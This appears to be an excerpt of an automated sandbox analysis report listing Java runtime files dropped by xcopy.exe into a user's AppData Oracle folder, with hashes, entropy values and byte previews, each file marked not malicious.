                                                                                                                                                                                                                                  MD5:A387B65159C9887265BABDEF9CA8DAE5
                                                                                                                                                                                                                                  SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                                                                                                                                                                                                                  SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                                                                                                                                                                                                                  SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\cmm\PYCC.pf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):274474
                                                                                                                                                                                                                                  Entropy (8bit):7.843290819622709
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                                                                                                                                                                                                                  MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                                                                                                                                                                                                                  SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                                                                                                                                                                                                                  SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                                                                                                                                                                                                                  SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..0*KCMS....spac3CLRLab .........2..acspSUNW....KODAnone............................................................................A2B0... ...4B2A0...T..f4cprt..-....Gdmnd..-....ndmdd...@...zwtpt........desc.......nK013../@....K019../L....K030../.....K031..0.....K070..0.....K071..0 ....mft2.....................................................K.S.8.....l.....0...3.........U.. .!h".$.%\&.'.)5*y+.,..5/o0.1.3.4E5v6.7.8.:*;S<z=.>.?.A.B,CLDkE.F.G.H.I.K.L!M7NLO`PsQ.R.S.T.U.V.W.X.Y.[.\.].^._%`,a2b8c=dAeEfHgJhLiMjMkMlLmKnIoFpCq@r;s7t1u,v%w.x.y.z.z.{.|.}.~...............p.b.S.C.3.#..............~.j.U.@.+.............t.\.C.*...........r.W.;...........p.R.3..........w.V.6.........l.J.'........v.R.-.......t.N.(.......f.?........v.N.%........U.+.......U.*......z.N."......n.@.......Z.+......o.@.........P. .......\.+.......d.1...........................z.p.f.[.Q.G.=.3.). ........................ .!.".#.$.%.&{'s(k)d*]+U,N-G.@/9021,2%3.4.5.6.7.8.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\cmm\sRGB.pf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3144
                                                                                                                                                                                                                                  Entropy (8bit):7.026867070945169
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                                                                                                                                                                                                                  MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                                                                                                                                                                                                                  SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                                                                                                                                                                                                                  SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                                                                                                                                                                                                                  SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\content-types.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5548
                                                                                                                                                                                                                                  Entropy (8bit):5.037985807321917
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:r45Vf4fq7MBzO4pYEZ2MQ6KXr3NO0slzMX+W1CuHvvABbiAQ+xaW/ioLHTU+Wsch:r4KJO4mEZ2MQ6Cr3NO0slzMX+WIuHvvv
                                                                                                                                                                                                                                  MD5:F507712B379FDC5A8D539811FAF51D02
                                                                                                                                                                                                                                  SHA1:82BB25303CF6835AC4B076575F27E8486DAB9511
                                                                                                                                                                                                                                  SHA-256:46F47B3883C7244A819AE1161113FE9D2375F881B75C9B3012D7A6B3497E030A
                                                                                                                                                                                                                                  SHA-512:CB3C99883336D04C42CEA9C2401E81140ECBB7FC5B8EF3301B13268A45C1AC93FD62176AB8270B91528AC8E938C7C90CC9663D8598E224794354546139965DFE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#sun.net.www MIME content-types table.#.# Property fields:.#.# <description> ::= 'description' '=' <descriptive string>.# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>.# <image> ::= 'icon' '=' <filename of icon image>.# <action> ::= 'browser' | 'application' | 'save' | 'unknown'.# <application> ::= 'application' '=' <command line template>.#..#.# The "we don't know anything about this data" type(s)..# Used internally to mark unrecognized types..#.content/unknown: description=Unknown Content.unknown/unknown: description=Unknown Data Type..#.# The template we should use for temporary files when launching an application.# to view a document of given type..#.temp.file.template: c:\\temp\\%s..#.# The "real" types..#.application/octet-stream: \..description=Generic Binary Stream;\..file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz..application/oda: \..description=ODA Document;\..file_extensions=.oda..application/pdf: \..de

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\currency.data

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4172
                                                                                                                                                                                                                                  Entropy (8bit):3.2688699228803304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:xlWAFFGFSupi9VBjOtF8CSh8kkC6/wU4XRr/bVdxe+0fBJ:xlWAEi9VBjOtzSh8kk0/pdTkr
                                                                                                                                                                                                                                  MD5:59CFF2DD57555A994A9546A7C5D066C3
                                                                                                                                                                                                                                  SHA1:0BF9BF04670E62C9BEA8A995B4AFE4AF3738FC8F
                                                                                                                                                                                                                                  SHA-256:9174361AA1251F9D6D55263ED0AD44EF4C58CA26B7937808B609B46FEC06950B
                                                                                                                                                                                                                                  SHA-512:358F2ACD2DE4957177EA624C5CE1C5596317F425B03D99B23D0727671C440E1034F52CB390568082DFC756C72C1DD9015DDCF9110C52B7184C05F35F1222929E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:CurD..........................@C..,M...................... K...C..PF..4@...........R...........C......TF...........M..DL...C.......S..........<M...c...................C...C...A..........hK...C...M.......... O.......M..PC...C..........@E...............E..............`.......pX...O...........B...C.......O...D..............,J..........................................@J..............XO..........................................0C...........................O...........................................M.......A...............................................................C...O...................................................................O..........TK...........R...O..............8C...........................P.................. C..............................................`C..........PK......................0F..pE...................................Q...............................R.......Q...........c...Q...................................................................................C

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5057015
                                                                                                                                                                                                                                  Entropy (8bit):6.569800609749605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:Ugl3o0ESJ+vH8wi7pmb7kfBIp54Ou96HYf9PYjC1:pbYE9gjC1
                                                                                                                                                                                                                                  MD5:C9E2E9AE1D3B960F817ABF4D05BCD677
                                                                                                                                                                                                                                  SHA1:898541B104BDC9697EAD08784A11F28F36F8D904
                                                                                                                                                                                                                                  SHA-256:EE17492548CA255A0BB3378AFD7FE2D1F7EDE58290434D8FF9A18402FA7AB72F
                                                                                                                                                                                                                                  SHA-512:2DF729C55BB12DC8A6904702AF1DB990EB83DBA7793AC0BAE3DD1AB71242D54063F001D151B041F281F7392C365EEB490A6F87EC739899096F2DB8911BFF6D44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK........<p.V................META-INF/....PK........;p.VB1.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK........9p.V................com/PK........9p.V................com/oracle/PK........9p.V................com/oracle/deploy/PK........;p.V................com/oracle/deploy/update/PK........9p.V................com/sun/PK........9p.V................com/sun/applet2/PK........9p.V................com/sun/applet2/preloader/PK........9p.V............ ...com/sun/applet2/preloader/event/PK........:p.V................com/sun/deploy/PK........9p.V................com/sun/deploy/appcontext/PK........9p.V................com/sun/deploy/association/PK........;p.V............#...com/sun/deploy/association/utility/PK........9p.V................com/sun/deploy/cache/PK........;p.V................com/sun/deploy/config/PK........:p.V................com/sun/deploy/jardiff/PK........9p.V................com/sun/deplo

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\ffjcext.zip

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14156
                                                                                                                                                                                                                                  Entropy (8bit):5.7224962963718315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Hl560PT95FQ7nZmKPmpaeWCQ9ezJyg7Uw94w9B0Jpq37S6tsQz/lWQrMl9Ezp57Q:HlrPThIZXWPc
                                                                                                                                                                                                                                  MD5:01F9F38C0BF5D0F7CF945D4C5CB74F4A
                                                                                                                                                                                                                                  SHA1:15D1E0D2486CF4E86B09F3A58058FBCB004B35E8
                                                                                                                                                                                                                                  SHA-256:7B58254BAC60EEAAC1BAC13D805C4438FB309AEC9E2C6228DA844BFD9F266080
                                                                                                                                                                                                                                  SHA-512:368A621EB26C06F490DF70232CB9B2A9425715744F62B7AE67C4107D0BF19DC724F057F4466BCFE0A0D346F0BC1FF25446D1251274AE51734B87CBE4C1C07166
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V............'...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/UT.....d..dux.............PK.........p.V................{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/UT.....d..dux.............PK.........p.V............6...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/UT.....d..dux.............PK.........p.V............>...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/UT.....d..dux.............PK.........p.VmV..........H...{CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT.....d..dux.............const gJavaConsole1_8_0_381 = {...id.: "javaconsole1.8.0_381",...mimeType: "application/x-java-applet;jpi-version=1.8.0_381",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_381.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_381.enable,false)

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                                                  Entropy (8bit):4.793521742012267
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pSDUEm98mDhDdDDLc59BXnnyzEEUFggBne8TCHCHb2ttfe4ey1nttAUicf9EEZze:pSDi98mFV45bAUS1HCHb2tjHEElfJo
                                                                                                                                                                                                                                  MD5:811BAFA6F97801186910E9B1D9927FE2
                                                                                                                                                                                                                                  SHA1:DC52841C708E3C1EB2A044088A43396D1291BB5E
                                                                                                                                                                                                                                  SHA-256:926CCADAEC649F621590D1AA5E915481016564E7AB28390C8D68BDAAF4785F1F
                                                                                                                                                                                                                                  SHA-512:5AE9C27DCE552EA32603B2C87C1510858F86D9D10CADE691B2E54747C3602FE75DE032CF8917DCD4EE160EE4CC5BE2E708B321BB1D5CDEBFA9FE46C2F870CA7C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=internal error, unknown message.error.badinst.nojre=Bad installation. No JRE found in configuration file.error.launch.execv=Error encountered while invoking Java Web Start (execv).error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) .error.listener.failed=Splash: sysCreateListenerSocket failed.error.accept.failed=Splash: accept failed.error.recv.failed=Splash: recv failed.error.invalid.port=Splash: didn't revive a valid port.error.read=Read past end of buffer.error.xmlparsing=XML Parsing error: wrong kind of token found.error.splash.exit=Java Web Start splash screen process exiting .....\n.# "Last WinSock Error" means the error message for the last operation that failed..error.winsock=\tLast WinSock Error: .error.winsock.load=Couldn't load winsock.dll.error.winsock.start=WSAStartup failed.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_de.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1345)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3306
                                                                                                                                                                                                                                  Entropy (8bit):4.888605396125911
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MLHMLhMXQXTyf2IXOZza2uuFMir25pAvAv2ITOsdK:OHOh4QD+JJcFZY+ITOqK
                                                                                                                                                                                                                                  MD5:D77C3B5274B8161328AB5C78F66DD0D0
                                                                                                                                                                                                                                  SHA1:D989FE1B8F7904888D5102294EBEFD28D932ECDB
                                                                                                                                                                                                                                  SHA-256:C9399A33BB9C75345130B99D1D7CE886D9148F1936543587848C47B8540DA640
                                                                                                                                                                                                                                  SHA-512:696E28B6BC7E834C51AB9821D0D65D1A32F00EB15CAA732047B751288EA73D8D703D3152BF81F267147F8C1538E1BF470748DF41176392F10E622F4C7708DD92
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=interner Fehler, unbekannte Meldung.error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden.error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten.error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten.error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich.error.accept.failed=Startbildschirm: accept nicht erfolgreich.error.recv.failed=Startbildschirm: recv nicht erfolgreich.error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich.error.read=\u00DCber Pufferende hinaus gelesen.error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden.error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n.# "Last WinSock Error" means the error mess

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_es.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1475)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3600
                                                                                                                                                                                                                                  Entropy (8bit):4.74546152535042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ovLS0y45dMsqf52i3nkrBpW/QiQdjY0CQ1G:oTSWw3foFNp71G
                                                                                                                                                                                                                                  MD5:6D32848BD173B9444B71922616E0645E
                                                                                                                                                                                                                                  SHA1:1B0334B79DB481C3A59BE6915D5118D760C97BAA
                                                                                                                                                                                                                                  SHA-256:BE987D93E23AB7318DB095727DEDD8461BA6D98B9409EF8FC7F5C79FA9666B84
                                                                                                                                                                                                                                  SHA-512:8E9E92D3229FF80761010E4878B4A33BFB9F0BD053040FE152565CFB2819467E9A92609B3786F9BDBF0D7934CF3C7D20BC3369FE1AD7D0DF7FADF561C3FDCA3C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=Error interno, mensaje desconocido.error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n.error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv).error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) .error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket.error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept.error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv.error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido.error.read=Lectura m\u00E1s all\u00E1 del final del buffer.error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido.error.splash.exit=Saliendo del proceso de la pantalla d

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_fr.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1575)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3409
                                                                                                                                                                                                                                  Entropy (8bit):4.800862996269612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pcj7LwORE+DNaQCJhSNiZGBk9zghSqvS//oTnvDHt65NA3gBne8p6KF/uoYuh1Lq:pc3LwqiJhSNiZNQSov0U4t1S4x8X/
                                                                                                                                                                                                                                  MD5:C11AB66FEDE3042EE75DFD19032C8A72
                                                                                                                                                                                                                                  SHA1:69BD2D03C2064F8679DE5B4E430EA61B567C69C5
                                                                                                                                                                                                                                  SHA-256:8DEEEC35ED29348F5755801F42675E3BF3FA7AD4B1E414ACCA283C4DA40E4D77
                                                                                                                                                                                                                                  SHA-512:072F8923DF111F82F482D65651758B8B4BA2486CB0EA08FB8B113F472A42A1C3BCB00DAE7D1780CF371E2C2BD955D8B66658D5EE15E548B1EEA16B312FDCBDF9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=erreur interne, message inconnu.error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration.error.launch.execv=Erreur lors de l'appel de Java Web Start (execv).error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) .error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket.error.accept.failed=Accueil : \u00E9chec d'accept.error.recv.failed=Accueil : \u00E9chec de recv.error.invalid.port=Accueil : impossible de r\u00E9activer un port valide.error.read=Lecture apr\u00E8s la fin de tampon.error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton.error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n.# "Last WinSock Error" means the error message for the last operation that failed..error.w

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_it.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1392)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3223
                                                                                                                                                                                                                                  Entropy (8bit):4.671266438569996
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:pbv+eaVtVVdMDCU02B9a8+eYbuKY8t5gBne8uo265eLaqMQ6URhmwgFs+ur6N:paearV4l+e6uKY8t5C26+7RhZgRN
                                                                                                                                                                                                                                  MD5:A81C4B0F3BF9A499429E14A881010EF6
                                                                                                                                                                                                                                  SHA1:DBE49949308F28540A42AE6CD2AD58AFBF615592
                                                                                                                                                                                                                                  SHA-256:550954F1F80FE0E73D74EB10AD529B454D5EBC626EB94A6B294D7D2ACF06F372
                                                                                                                                                                                                                                  SHA-512:6FED61CBCD7FE82C15C9A312ACED9D93836EBCFFAF3E13543BC9DD8B4C88400C371D2365FEEE0F1BB844A6372D4128376568A5B6FE666FD6213636FCBD8C7791
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=errore interno, messaggio sconosciuto.error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione.error.launch.execv=Errore durante la chiamata di Java Web Start (execv).error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) .error.listener.failed=Apertura: sysCreateListenerSocket non riuscito.error.accept.failed=Apertura: accept non riuscito.error.recv.failed=Apertura: recv non riuscito.error.invalid.port=Apertura: impossibile identificare una porta valida.error.read=Tentativo di lettura dopo la fine del buffer.error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato.error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n.# "Last WinSock Error" means the error message for the last operation that faile

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ja.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2924)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6349
                                                                                                                                                                                                                                  Entropy (8bit):4.575777726495053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Ltk1ZccBD8M25jCTDrk9/RoaG7THG9o7f6tEflA44CAmIbIC3j5pN/o8woJb:W1xBY1CG6OlG2r
                                                                                                                                                                                                                                  MD5:B7279F1C3BA0B63806F37F6B9D33C314
                                                                                                                                                                                                                                  SHA1:751170A7CDEFCB1226604AC3F8196E06A04FD7AC
                                                                                                                                                                                                                                  SHA-256:8D499C1CB14D58E968A823E11D5B114408C010B053B3B38CFEF7EBF9FB49096F
                                                                                                                                                                                                                                  SHA-512:4A3BF898A36D55010C8A8F92E5A784516475BDFFFCD337D439D6DA251DDB97BCC7E26F104AC5602320019ED5C0B8DC8883B2581760AFEA9C59C74982574D164B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8.error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093.error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv).error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) .error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F.error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F.error.recv.failed=\u30B9\

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ko.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2601)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5712
                                                                                                                                                                                                                                  Entropy (8bit):4.758283080201437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:fiX7fdokXLqlz9yx3f7yhJxpmG32i0HkZr+ywc8b8+/moD7yct070DL70Dj:g7ucLoINAYGbT/44i4
                                                                                                                                                                                                                                  MD5:FED33982E349F696EF21E35ED0DBBDE3
                                                                                                                                                                                                                                  SHA1:BF9E055B5AB138AD6D49769E2B7630B7938848D6
                                                                                                                                                                                                                                  SHA-256:D9C95C31B4C1092F32BDCF40D5232B31CC09FB5B68564067C1C2A5F59D3869FA
                                                                                                                                                                                                                                  SHA-512:88B16B7C3ACFED2FC4B1E3A14006FEF532147EB1E2930D8966E90629069462FB2E8CBF65F561E6CBC9A946F39D1866583CB02D6BB84C60C71428F489DAAA61EF
                                                                                                                                                                                                                                  Malicious:false
